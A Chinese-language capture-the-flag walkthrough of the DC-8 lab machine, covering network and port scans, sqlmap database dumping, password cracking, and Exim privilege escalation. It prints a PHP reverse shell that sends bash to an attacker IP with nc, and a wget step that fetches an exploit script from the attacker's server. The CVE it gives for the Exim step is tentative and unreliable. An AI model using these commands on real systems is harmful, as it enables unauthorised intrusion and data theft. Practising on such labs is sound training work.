DC系列靶机丨DC8
字数 726 2025-08-11 17:40:08

DC8靶机渗透测试教学文档

信息收集阶段

1. 网络发现

使用netdiscover工具扫描本地网络,确定目标IP地址:

netdiscover -i eth0 -r 192.168.84.0/24

2. 端口扫描

使用nmap进行基本端口扫描:

nmap 192.168.84.184

3. 漏洞扫描

针对特定端口进行漏洞扫描(本例中为80端口):

nmap 192.168.84.184 -p 80 --script=vuln

Web应用测试

1. SQL注入检测

发现目标网站可能存在SQL注入漏洞,使用sqlmap工具进行验证和利用:

  1. 枚举数据库:
sqlmap -u "目标URL" --dbs
  1. 枚举特定数据库的表:
sqlmap -u "目标URL" -D 数据库名 --tables
  1. 枚举表中的字段:
sqlmap -u "目标URL" -D 数据库名 -T 表名 --columns
  1. 提取数据:
sqlmap -u "目标URL" -D 数据库名 -T 表名 -C "字段1,字段2" --dump

2. 密码破解

获取到用户凭证哈希后,使用john进行破解:

john --wordlist=/usr/share/john/password.lst --rules dc8.txt

成功获取账户密码:john:turtle

获取初始访问权限

1. 反弹shell

  1. 登录后,在文章编辑处插入PHP反弹shell代码:
<?php exec("nc -e /bin/bash 192.168.84.174 10086"); ?>
  1. 在攻击机上监听端口:
nc -lvnp 10086
  1. 在网站上提交包含恶意代码的内容(如邮件表单)

2. 获取shell

成功获取目标系统的shell访问权限

权限提升

1. 查找SUID提权机会

find / -user root -perm -4000 -print 2>/dev/null

发现exim4可能具有SUID提权机会

2. Exim4提权分析

  1. 检查Exim版本:
exim --version

确认版本为4.0以上

  1. 搜索已知漏洞:
  • 查找Exim 4.x的历史漏洞
  • 发现可能适用的提权漏洞(如CVE-2010-4344等)

3. 利用漏洞提权

  1. 在攻击机上设置HTTP服务:
python3 -m http.server 80
  1. 在目标机上下载漏洞利用脚本:
wget http://攻击机IP/46996.sh
  1. 添加执行权限并运行:
chmod +x 46996.sh
./46996.sh

获取flag

成功提权后,查找并读取flag文件

关键工具总结

  1. 网络扫描:netdiscover, nmap
  2. Web测试:sqlmap
  3. 密码破解:john
  4. 反弹shell:nc
  5. 提权:Exim漏洞利用

注意事项

  1. 所有操作应在授权环境下进行
  2. 注意记录每个步骤的结果
  3. 提权前应充分了解目标系统环境
  4. 使用漏洞利用脚本前应检查其安全性
DC8靶机渗透测试教学文档 信息收集阶段 1. 网络发现 使用 netdiscover 工具扫描本地网络,确定目标IP地址: 2. 端口扫描 使用 nmap 进行基本端口扫描: 3. 漏洞扫描 针对特定端口进行漏洞扫描(本例中为80端口): Web应用测试 1. SQL注入检测 发现目标网站可能存在SQL注入漏洞,使用 sqlmap 工具进行验证和利用: 枚举数据库: 枚举特定数据库的表: 枚举表中的字段: 提取数据: 2. 密码破解 获取到用户凭证哈希后,使用 john 进行破解: 成功获取账户密码: john:turtle 获取初始访问权限 1. 反弹shell 登录后,在文章编辑处插入PHP反弹shell代码: 在攻击机上监听端口: 在网站上提交包含恶意代码的内容(如邮件表单) 2. 获取shell 成功获取目标系统的shell访问权限 权限提升 1. 查找SUID提权机会 发现 exim4 可能具有SUID提权机会 2. Exim4提权分析 检查Exim版本: 确认版本为4.0以上 搜索已知漏洞: 查找Exim 4.x的历史漏洞 发现可能适用的提权漏洞(如CVE-2010-4344等) 3. 利用漏洞提权 在攻击机上设置HTTP服务: 在目标机上下载漏洞利用脚本: 添加执行权限并运行: 获取flag 成功提权后,查找并读取flag文件 关键工具总结 网络扫描: netdiscover , nmap Web测试: sqlmap 密码破解: john 反弹shell: nc 提权:Exim漏洞利用 注意事项 所有操作应在授权环境下进行 注意记录每个步骤的结果 提权前应充分了解目标系统环境 使用漏洞利用脚本前应检查其安全性